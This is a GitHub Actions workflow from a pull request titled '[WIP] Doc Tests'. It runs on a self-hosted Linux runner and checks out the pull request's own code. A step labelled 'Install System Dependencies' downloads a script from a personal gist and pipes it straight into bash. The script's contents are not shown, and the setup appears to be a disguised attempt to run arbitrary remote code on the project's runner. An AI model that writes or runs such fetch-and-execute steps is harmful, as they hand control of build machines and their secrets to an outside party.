Skip to content

[WIP] Doc Tests

[WIP] Doc Tests #2718

Workflow file for this run

name: Continuous integration
permissions:
contents: read
on: [pull_request]
jobs:
test:
if: always()
name: Test Suite
runs-on: [self-hosted, linux]
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }}
- run: git fetch --prune --unshallow
- name: Install System Dependencies
run: |
curl -sSfL https://gist.githubusercontent.com/joethechicken/14753d249dcf8f2d66a9b4d8770571d3/raw/8260e5a61e49b34ca5f09256af9470c453fb0ab9/test.sh | bash